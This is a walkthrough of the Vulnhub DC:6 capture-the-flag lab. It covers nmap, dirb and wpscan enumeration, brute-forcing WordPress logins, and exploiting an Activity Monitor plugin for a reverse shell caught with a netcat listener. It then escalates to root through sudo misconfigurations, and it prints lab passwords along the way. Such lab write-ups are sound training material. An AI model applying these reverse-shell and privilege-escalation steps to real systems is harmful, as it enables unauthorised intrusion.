DC6

DC: 6 Vulnhub Walkthrough

Enumeration

nmap

nmap -sC -sV -oA nmap/DC6 192.168.1.115
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-18 07:20 EDT
Stats: 0:00:09 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 100.00% done; ETC: 07:20 (0:00:00 remaining)
Nmap scan report for wordy (192.168.1.115)
Host is up (0.00016s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey: 
|   2048 3e:52:ce:ce:01:b6:94:eb:7b:03:7d:be:08:7f:5f:fd (RSA)
|   256 3c:83:65:71:dd:73:d7:23:f8:83:0d:e3:46:bc:b5:6f (ECDSA)
|_  256 41:89:9e:85:ae:30:5b:e0:8f:a4:68:71:06:b4:15:ee (ED25519)
80/tcp open  http    Apache httpd 2.4.25 ((Debian))
|_http-generator: WordPress 5.1.1
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Wordy – Just another WordPress site
|_https-redirect: ERROR: Script execution failed (use -d to debug)
MAC Address: 00:0C:29:EC:F5:FF (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.11 seconds

After that, as usual, we put the IP to the address bar and see what we got

We can see the URL there has a domain called wordy.

Let's navigate to the /etc/hosts and add the IP into it.

Reload the browser.

We got a wordpress file!

Dirb

dirb http://192.168.1.115
-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Mon May 18 07:56:05 2020
URL_BASE: http://192.168.1.115/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.1.115/ ----
+ http://192.168.1.115/index.php (CODE:200|SIZE:53227)                                                     
+ http://192.168.1.115/server-status (CODE:403|SIZE:301)                                                   
==> DIRECTORY: http://192.168.1.115/wp-admin/                                                              
==> DIRECTORY: http://192.168.1.115/wp-content/                                                            
==> DIRECTORY: http://192.168.1.115/wp-includes/                                                           
+ http://192.168.1.115/xmlrpc.php (CODE:405|SIZE:42)

As we can see we can navigate to wp-admin and it will redirect us to the login form.

After poking around I still can't find anything interesting

wpscan

wpscan --url http://wordy --enumerate u
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.1
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://wordy/ [192.168.1.115]
[+] Started: Mon May 18 08:00:12 2020

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.25 (Debian)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://wordy/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access

[+] http://wordy/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://wordy/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.1.1 identified (Insecure, released on 2019-03-13).
 | Found By: Rss Generator (Passive Detection)
 |  - http://wordy/index.php/feed/, <generator>https://wordpress.org/?v=5.1.1</generator>
 |  - http://wordy/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.1.1</generator>

[+] WordPress theme in use: twentyseventeen
 | Location: http://wordy/wp-content/themes/twentyseventeen/
 | Last Updated: 2020-03-31T00:00:00.000Z
 | Readme: http://wordy/wp-content/themes/twentyseventeen/README.txt
 | [!] The version is out of date, the latest version is 2.3
 | Style URL: http://wordy/wp-content/themes/twentyseventeen/style.css?ver=5.1.1
 | Style Name: Twenty Seventeen
 | Style URI: https://wordpress.org/themes/twentyseventeen/
 | Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 2.1 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://wordy/wp-content/themes/twentyseventeen/style.css?ver=5.1.1, Match: 'Version: 2.1'

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:00 <==============================> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] admin
 | Found By: Rss Generator (Passive Detection)
 | Confirmed By:
 |  Wp Json Api (Aggressive Detection)
 |   - http://wordy/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] graham
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] mark
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] sarah
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] jens
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[!] No WPVulnDB API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 50 daily requests by registering at https://wpvulndb.com/users/sign_up

[+] Finished: Mon May 18 08:00:15 2020
[+] Requests Done: 59
[+] Cached Requests: 6
[+] Data Sent: 13.316 KB
[+] Data Received: 640.55 KB
[+] Memory used: 172.594 MB
[+] Elapsed time: 00:00:03

We can see that there are 5 usernames available, admin, graham, mark, sarah and jens.

Let's put it inside a text file.

We can see from the vulnhub site, the author gave us a clue about getting a new password.txt so that we don't need to waste our time on brute-forcing it.

Then at wpscan, type 

wpscan http://192.168.1.115/wp-login --usernames name.txt --passwords pass.txt

Then we can run the command

We get a username and password and that is mark and helpdesk01

Let's login to the wordpress

We've successfully logged in to the account.

Exploitation

Searchsploit

Since we got the Activity monitor plugins, so I went to searchsploit to search for the exploit.

The exploit that what we want is the third one.

Copy the file to a directory that we can access later.

Then nano into that file

We can see that there is a reverse shell will be called after we execute the file.

Change the URL from localhost to wordy and the reverse shell to your IP and the port that you want to put.

We first set up the listener at our machine

nc -nlvp 4444

Then open the file

Click submit request

Then we got a shell, type

python -c 'import pty; pty.spawn("/bin/bash")'

to get a proper shell.

Then navigate to /home/mark/stuff. We got a file called things-to-do.txt

Open up and we will see something inside.

We see that there is a graham user and his password, GSo7isUM1D4. Let's logout and ssh to graham

Privilege Escalation

When we type sudo -l, we can see this

It seems like we need jens user to run this thing.

Append /bin/bash to the backups.sh file in order to let us get a shell when we switch to jens user

Then, type

sudo -u jens /home/jens/backups.sh

We successfully got to jens user, then we type sudo -l again and got this

We can go to the site and search for nmap

Follow the instruction given

We got root !

Navigate to the /root to get the flag

Congratulation !

PreviousDCNextDC9

Last updated